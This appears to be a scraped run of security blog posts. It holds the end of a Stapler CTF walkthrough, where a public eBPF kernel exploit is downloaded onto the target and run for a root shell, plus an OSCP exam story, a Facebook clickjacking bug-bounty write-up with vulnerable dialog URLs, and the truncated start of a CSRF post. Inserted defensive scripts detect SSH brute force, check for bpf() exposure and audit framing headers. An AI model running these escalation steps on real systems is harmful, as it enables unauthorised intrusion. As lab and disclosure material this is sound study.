<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ lsb_release -a</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">No LSB modules are available.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Distributor ID: Ubuntu</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Description: Ubuntu 16.04 LTS</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Release: 16.04</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codename: xenial</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$</span><br />
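Before moving on to privilege escalation, here is the defender's side of the Hydra run above. This is an added example, not part of the original walkthrough: it reads OpenSSH auth.log lines and flags a source that fails many logins within a short window, listing the usernames tried and any account that was subsequently accepted from the same source, which is the target-side view of Hydra's "[22][ssh] host: ... login: ..." line. The log lines are constructed to resemble what such a run would leave on the box (hostname "red"); they were not captured from it. The function names and thresholds are my choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines (not captured from the Stapler box): they
# model what a password-guessing run like the Hydra session above leaves behind
# on the target, whose hostname is "red".
SAMPLE_AUTH_LOG = """\
Jun  9 13:11:16 red sshd[2101]: Failed password for invalid user Bart from 192.168.1.2 port 51002 ssh2
Jun  9 13:11:16 red sshd[2102]: Failed password for invalid user Harry from 192.168.1.2 port 51003 ssh2
Jun  9 13:11:17 red sshd[2103]: Failed password for SHayslett from 192.168.1.2 port 51004 ssh2
Jun  9 13:11:17 red sshd[2104]: Failed password for invalid user Dave from 192.168.1.2 port 51005 ssh2
Jun  9 13:11:18 red sshd[2105]: Failed password for invalid user Kathy from 192.168.1.2 port 51006 ssh2
Jun  9 13:11:18 red sshd[2106]: Accepted password for SHayslett from 192.168.1.2 port 51007 ssh2
Jun  9 13:20:02 red sshd[2200]: Accepted publickey for peter from 192.168.1.7 port 40211 ssh2
Jun  9 13:21:40 red sshd[2210]: Failed password for peter from 192.168.1.7 port 40215 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2016):
    """Parse one sshd auth.log line into a dict, or None for unrelated lines.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=4, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed logins inside any `window`,
    and report which accounts were then accepted from that same source."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        # Sliding window over the failures: peak = most failures within `window`.
        peak, start = 0, 0
        for end in range(len(failures)):
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_failure = failures[-1]["ts"]
        # A success from the same source at or after the burst is the strongest
        # signal: a guessed password, which is what Hydra reports on its side.
        compromised = sorted({e["user"] for e in evs
                              if e["result"] == "Accepted" and e["ts"] >= last_failure})
        findings.append({
            "ip": ip,
            "failures_in_window": peak,
            "users_tried": sorted({e["user"] for e in failures}),
            "compromised_accounts": compromised,
        })
    return sorted(findings, key=lambda f: -f["failures_in_window"])


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(finding)
```

On the sample the single finding is for 192.168.1.2: five failures in two seconds across five usernames, followed by an accepted password for SHayslett. The one failure from 192.168.1.7 stays below the threshold, which is the point of the window: ordinary typos do not page anyone.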
<br />
The next step is to get root privileges, for which we need a local privilege escalation vulnerability. There are multiple ways to do it. The simplest is to identify the OS version and look for a public exploit on exploit-db. The machine is Ubuntu 16.04 LTS. A quick check turns up this exploit by the Project Zero team:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://www.exploit-db.com/exploits/39772/">https://www.exploit-db.com/exploits/39772/</a></span><br />
Exploit Code:<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><a href="https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552">https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552</a></span><br />
<br />
My Kali VM didn't have Internet access, so I downloaded the exploit on my host and hosted it on a web server. Let's get this exploit onto the target, where we already have shell access, and hope it works !!<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ wget http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">--2016-06-10 00:17:40-- http://192.168.1.5/exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Connecting to 192.168.1.5:80... connected.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">HTTP request sent, awaiting response... 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Length: 20480 (20K) [application/x-tar]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Saving to: ‘exploit.tar’</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">exploit.tar 100%[========================>] 20.00K --.-KB/s in 0.001s </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2016-06-10 00:17:40 (34.8 MB/s) - ‘exploit.tar’ saved [20480/20480]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ tar -xf exploit.tar </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ ls</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ebpf_mapfd_doubleput_exploit exploit.tar</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~$ cd ebpf_mapfd_doubleput_exploit/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 SHayslett SHayslett 4096 Apr 25 23:25 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 SHayslett SHayslett 4096 Jun 10 00:20 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 SHayslett SHayslett 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$</span><br />
<br />
The exploit-db link shows how to use this.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ./compile.sh </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c: In function ‘make_setuid’:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .insns = (__aligned_u64) insns,</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .license = (__aligned_u64)""</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ^</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 60</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-x--- 2 SHayslett SHayslett 4096 Jun 10 00:20 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 4 SHayslett SHayslett 4096 Jun 10 00:20 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-x--- 1 SHayslett SHayslett 155 Apr 25 23:25 compile.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 12328 Jun 10 00:20 doubleput</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 4188 Apr 25 23:25 doubleput.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 8020 Jun 10 00:20 hello</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 2186 Apr 25 23:25 hello.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxrwxr-x 1 SHayslett SHayslett 7516 Jun 10 00:20 suidhelper</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r----- 1 SHayslett SHayslett 255 Apr 25 23:25 suidhelper.c</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SHayslett@red:~/ebpf_mapfd_doubleput_exploit$ ./doubleput </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">starting writev</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">woohoo, got pointer reuse</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">suid file detected, launching rootshell...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">we have root privs now...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# id</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uid=0(root) gid=0(root) groups=0(root),1005(SHayslett)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# </span><br />
<br />
And it just works !! Here is the flag.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:~/ebpf_mapfd_doubleput_exploit# cd /root</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# ls -la</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">total 208</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwx------ 4 root root 4096 Jun 9 21:08 .</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 22 root root 4096 Jun 7 09:08 ..</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .bash_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 root root 1090 Jun 5 23:56 fix-wordpress.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 463 Jun 5 19:50 flag.txt</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 345 Jun 5 16:13 issue</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 50 Jun 3 15:15 .my.cnf</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .mysql_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 11 root root 4096 Jun 3 15:42 .oh-my-zsh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 148 Aug 17 2015 .profile</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rwxr-xr-x 1 root root 103 Jun 5 18:14 python.sh</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1024 Jun 5 17:33 .rnd</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jun 4 00:21 .vim</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 1 Jun 5 19:44 .viminfo</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 54405 Jun 5 23:28 wordpress.sql</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 39206 Jun 3 15:21 .zcompdump</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 39352 Jun 3 15:42 .zcompdump-red-5.1.1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw------- 1 root root 39 Jun 5 23:31 .zsh_history</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 2839 Jun 3 15:42 .zshrc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-rw-r--r-- 1 root root 17 Jun 3 15:42 .zsh-update</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# cat flag.txt </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~~~~~~~~~~<(Congratulations)>~~~~~~~~~~</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-'''''-.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |'-----'|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> |-.....-|</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> _,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> __.o` o`"-. | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .-O o `"-.o O )_,._ | |</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">( o O o )--.-"`O o"-.`'-----'`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> '--------' ( o O o) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `----------`</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b6b545dc11b7a270f4bad23432190c75162c4a2b</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@red:/root# </span><br />
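From the defender's side, what the escalation above depends on. This is an added example, not part of the walkthrough or of the Project Zero exploit: the bug behind exploit-db 39772 is reached through the bpf() system call from an unprivileged process, and since kernel 4.4 the sysctl kernel.unprivileged_bpf_disabled can close that surface while the kernel update is rolled out. The script below parses the running kernel release, reads that sysctl, and optionally compares the release with one the operator knows to contain the fix. The fixed_release value is a placeholder to be taken from the distribution advisory (the page gives no fixed version), and the function names are mine.

```python
import re

SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"

# "4.4.0-21-generic" -> major.minor.patch plus Ubuntu's ABI number after the dash.
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_kernel_release(release):
    """'4.4.0-21-generic' -> (4, 4, 0, 21); the ABI field is 0 when absent."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch), int(abi or 0))


def read_sysctl(path=SYSCTL_PATH):
    """Return the sysctl value as a string, or None if the kernel does not expose it."""
    try:
        with open(path) as f:
            return f.read().strip()
    except FileNotFoundError:
        return None


def assess_bpf_exposure(kernel_release, sysctl_value, fixed_release=None):
    """Decide whether unprivileged bpf() is reachable on this host.

    kernel_release: output of `uname -r`
    sysctl_value:   content of kernel.unprivileged_bpf_disabled, or None if absent
    fixed_release:  PLACEHOLDER supplied by the operator from the distro advisory;
                    not a value taken from the page
    """
    ver = parse_kernel_release(kernel_release)
    finding = {"kernel": kernel_release, "unprivileged_bpf": None,
               "patched": None, "actions": []}
    if ver[:2] < (4, 4):
        # Non-root eBPF program loading only arrived in 4.4; older kernels have
        # no unprivileged bpf() surface and no such sysctl.
        finding["unprivileged_bpf"] = "unavailable"
    elif sysctl_value is None:
        finding["unprivileged_bpf"] = "unknown"
        finding["actions"].append(
            "sysctl missing on a >= 4.4 kernel: check CONFIG_BPF_SYSCALL and the sysctl path")
    elif sysctl_value == "0":
        finding["unprivileged_bpf"] = "enabled"
        # Value 1 disables unprivileged bpf() and, on these kernels, cannot be
        # cleared again without a reboot, so persist it in /etc/sysctl.d as well.
        finding["actions"].append(
            "set kernel.unprivileged_bpf_disabled=1 (sysctl -w, then persist in /etc/sysctl.d)")
    else:
        finding["unprivileged_bpf"] = "disabled"
    if fixed_release is not None:
        finding["patched"] = ver >= parse_kernel_release(fixed_release)
        if not finding["patched"]:
            finding["actions"].append(f"upgrade kernel to >= {fixed_release} and reboot")
    return finding


if __name__ == "__main__":
    import os
    # On a live host: compare against the advisory's fixed release (placeholder here).
    print(assess_bpf_exposure(os.uname().release, read_sysctl(),
                              fixed_release="0.0.0-0-PLACEHOLDER"))
```

Two points the check encodes: the sysctl is the stopgap, not the fix, because it only removes the unprivileged entry point, and a version compare on Ubuntu kernels has to include the ABI number after the dash, since that is where security updates are counted.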
<br />
The readme of Stapler mentioned there are 2 ways to get a limited shell. The other one seems more interesting. I shall work on finding it and other ways of getting root.<br />
<br />
Hope you like this walkthrough !!</div>
Author: AMol NAik (http://www.blogger.com/profile/03701068634043898539)<br />
<br />
My Journey to OSCP (published 2012-11-21)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This all started when I enrolled for PWB, the most exciting course in network security. I had enough days to spend in the lab, but the pressure was to complete it in a month's time. I started the lab from day 1. The lab was the most exciting thing. It taught me "<b>Enumeration is the KEY</b>". Enumerate, enumerate & enumerate before exploitation.<br />
<br />
The lab had approx 60 machines waiting to get pwned, with different OSes and vulnerabilities. I managed to reach the lab goal, pwning all targets in the path.<br />
<br />
It was fun to get a shell on a server.<br />
<br />
Then the day arrived when I decided to take the challenge. I chose the slot from 11:30PM as I'm good at night. I took a good sleep the night before and during the day. I was a bit relaxed and confident, waiting for the mail with the exam setup.<br />
<br />
At 11:30PM, the mail arrived with all necessary information for the exam. Looking at it, I felt confident and started my enumeration phase.<br />
<br />
Till 5:00AM, I managed to reach half way. Felt good. And then it happened. Next 10 hrs, no success. Still at the half-way mark. I started feeling frustrated, with decreasing confidence. Damn ... everything was perfect but something was not working. :(<br />
<br />
At 1:00PM, I had lunch and started fresh with other targets, since the last one was more painful. Bingo!! More success!! But still less.<br />
<br />
This increased my confidence a little. Now I decided to head for the painful target one more time. I had a backup plan in mind if this thing didn't work for the next 2 hrs. My heart started beating faster and faster as time was running out.<br />
<br />
And it happened !! I managed to score more than the passing limit. Hush!! :)<br />
<br />
My well-wishers encouraged me to go after 100pts, but I decided to stop here. This is mostly due to the stress I experienced in the last 24hrs.<br />
<br />
There were moments during the challenge when you see all things perfect but the result is fail. I learned to keep an eye on very small details, which effectively make a big difference.<br />
<br />
During all these painful 30 days, my wife stood behind me, and this certification would not have been possible without her help and support. I thank you, my Love.<br />
<br />
I would like to thank all my friends from <a href="http://www.garage4hackers.com/">garage4hackers</a>, especially <a href="http://www.garage4hackers.com/members/b0nd/">b0nd</a> for his suggestions and encouragement. Also I would like to thank "T.Basu" for support.<br />
<br />
Now I can proudly shout "<b>I'm OSCP</b>".<br />
</div>
Author: AMol NAik (http://www.blogger.com/profile/03701068634043898539)<br />
<br />
No XFO? It's time for Facebook Clickjacking (published 2012-08-21)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This post is a summary of the <a href="https://www.owasp.org/index.php/Clickjacking">clickjacking</a> bugs I reported to the <a href="https://www.facebook.com/whitehat/bounty/">Facebook bug bounty program</a>. All the bugs discussed here are now fixed. An attacker was able to add any malicious Facebook app, with any permissions, to the victim's account with just one click. The vulnerable pages discussed below lacked anti-clickjacking protection such as the <a href="https://developer.mozilla.org/en-US/docs/The_X-FRAME-OPTIONS_response_header">X-Frame-Options</a> header, so they could be rendered inside an (invisible) iframe.<br />
<br />
The first bug I found was in the <b>permissions.request</b> dialog on the <a href="http://m.facebook.com/">Facebook Mobile</a> site. This dialog was used to add Facebook apps for the authenticated user. A single click on the "Allow" button would add the app to the victim's Facebook profile.<br />
<br />
The vulnerable link, which adds "Graph API Explorer" app, was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">http://m.facebook.com/dialog/permissions.request?app_id=145634995501895&display=wap&next=http%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fexplorer%2Fcallback&response_type=code&fbconnect=1</span><br />
<br />
Here the "display" parameter was used to decide the appearance of the page based on the value supplied. It has 3 values: page, wap & touch. The page display was mainly used on the Facebook main site, and wap & touch were for the Facebook mobile site.<br />
<br />
The next bug was a variation of the previous one, where the <b>permissions.request</b> dialog page could be rendered in an iframe with the "<b>display=wap</b>" parameter. With this parameter, the page looks like the mobile Facebook page on the Facebook main site, which was lacking clickjacking protection at that time. The vulnerable page for this was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">https://www.facebook.com/dialog/permissions.request?app_id=113556445341048&redirect_uri=http%3A%2F%2Fapps.facebook.com%2Fiastrology%2F%3Finstalled%3D1&display=wap&response_type=code&canvas=1&perms=user_birthday%2Cfriends_birthday%2Cemail</span><br />
<br />
By this point I had learned new things about these dialogs and was able to add any <a href="https://developers.facebook.com/docs/authentication/permissions/">permissions</a> to the app.<br />
<br />
The last bug was about the <a href="https://developers.facebook.com/docs/reference/dialogs/oauth/">oauth dialog</a>. This was again from the Facebook Mobile site. The vulnerable page was:<br />
<br />
<span style="background-color: #cccccc; font-family: Courier New, Courier, monospace;">https://m.facebook.com/dialog/oauth?client_id=380424275310198&redirect_uri=http%3A%2F%2Fwlcm.info%2Fbday%2Fh%2Fmain.php&state=13629742989dab8ab4e9681582a6fb2c&scope=status_update%2Cpublish_stream%2Cuser_birthday&response_type=code</span><br />
<br />
Sadly this bug didn't win any bounty, as Facebook said "<b>This can't be protected with X-Frame-Options because it needs to be servable in an arbitrary iframe.</b>".<br />
<br />
Well, I developed my own <a href="http://amolnaik4.blogspot.in/2011/12/presentation-make-profit-with-ui.html">process</a> to find such bugs, which helps me identify them quickly.<br />
<br />
All of these bugs result in adding a malicious app with unwanted permissions to the victim's account with only a single user click. These permissions include access to email, status messages and many other things.<br />
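One check a developer or reviewer can run against dialogs like these, as an added example that is not from the post or from Facebook: given a response's headers it decides whether the page can be framed by an arbitrary origin, honouring Content-Security-Policy frame-ancestors (which takes precedence over X-Frame-Options when present) as well as X-Frame-Options, and for a page that by design must be embeddable anywhere (the oauth dialog case above) it reports that no header can fix it, so the grant step needs a design-level control instead. The header sets are constructed to model the states discussed in the post; function names and the wording of the recommendations are mine.

```python
def _frame_ancestors(csp_value):
    """Return the frame-ancestors source list from a CSP header, or None if absent.
    An empty source list means 'none' per the CSP spec."""
    for directive in csp_value.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]] or ["'none'"]
    return None


def frame_policy(headers):
    """Map response headers to a framing policy.

    Returns (policy, decided_by): policy is 'any', 'none', 'same-origin' or a
    list of allowed ancestor source expressions."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy")
    if csp:
        sources = _frame_ancestors(csp)
        if sources is not None:
            # When frame-ancestors is present, browsers ignore X-Frame-Options.
            if sources == ["'none'"]:
                return "none", "csp"
            if "*" in sources:
                return "any", "csp"
            if sources == ["'self'"]:
                return "same-origin", "csp"
            return sources, "csp"
    xfo = h.get("x-frame-options")
    if xfo is None:
        return "any", "missing"          # the state of the dialogs in this post
    value = xfo.strip().lower()
    if value == "deny":
        return "none", "xfo"
    if value == "sameorigin":
        return "same-origin", "xfo"
    if value.startswith("allow-from"):
        # Obsolete directive that current browsers ignore; listed but not relied on.
        return value.split(None, 1)[1:], "xfo-obsolete"
    # Unrecognised value: assume it gives no protection (worst case for an audit).
    return "any", "xfo-invalid"


def audit_framing(page, headers, must_embed_anywhere=False):
    """Produce a finding for one response. must_embed_anywhere models the oauth
    dialog case, where the page has to be servable in arbitrary iframes."""
    policy, decided_by = frame_policy(headers)
    clickjackable = policy == "any"
    finding = {"page": page, "policy": policy, "decided_by": decided_by,
               "clickjackable": clickjackable, "fix": None}
    if clickjackable:
        if must_embed_anywhere:
            finding["fix"] = ("no header fix possible: move the sensitive action (Allow/grant) "
                              "to a step that only completes on a non-embeddable top-level page")
        else:
            finding["fix"] = ("Content-Security-Policy: frame-ancestors 'none' "
                              "(and X-Frame-Options: DENY for older browsers)")
    return finding


# Constructed header sets modelling the states discussed in the post.
SAMPLES = [
    ("permissions.request dialog, before fix", {"Content-Type": "text/html"}, False),
    ("permissions.request dialog, after fix", {"X-Frame-Options": "DENY"}, False),
    ("dialog with CSP", {"X-Frame-Options": "DENY",
                         "Content-Security-Policy":
                         "default-src 'self'; frame-ancestors 'self' https://apps.example.test"}, False),
    ("oauth dialog (must embed anywhere)", {"Content-Type": "text/html"}, True),
]


def run_audit(samples=SAMPLES):
    return [audit_framing(name, hdrs, embed) for name, hdrs, embed in samples]


if __name__ == "__main__":
    for f in run_audit():
        print(f)
```

The audit deliberately treats a missing or unparseable header as frameable, so a response that protects itself only through an obsolete ALLOW-FROM value or a typo is surfaced rather than silently passed.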
<br />
Here is a small demonstration:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/L49IixSoteI?feature=player_embedded' frameborder='0'></iframe></div>
<br />
<br />
That's all. Hope you like this post. Suggestions and comments are welcome.<br />
</div>
Author: AMol NAik (http://www.blogger.com/profile/03701068634043898539)<br />
<br />
Facebook CSRF worth USD 5000 (published 2012-08-19)<div dir="ltr" style="text-align: left;" trbidi="on">
This post is about a <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">Cross-Site Request Forgery (CSRF)</a> bug in Facebook I recently reported, which is now fixed. One fine day, when I logged into Facebook, I noticed a new feature, "Appcenter". This feature allows you to choose the apps you need. Game apps like FarmVille are more popular.<br />
<br />
I was previously working on apps, so I decided to give this new feature a shot. The game apps, when the "Play Game" button was clicked, were generating a POST request.<br />
<br />
Example:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">POST /connect/uiserver.php HTTP/1.1</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Host: www.facebook.com</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept-Language: en-us,en;q=0.5</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Accept-Encoding: gzip, deflate</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Connection: keep-alive</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Cookie: <user_cookies></span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Content-Type: application/x-www-form-urlencoded</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">Content-Length: 800</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br /></span>
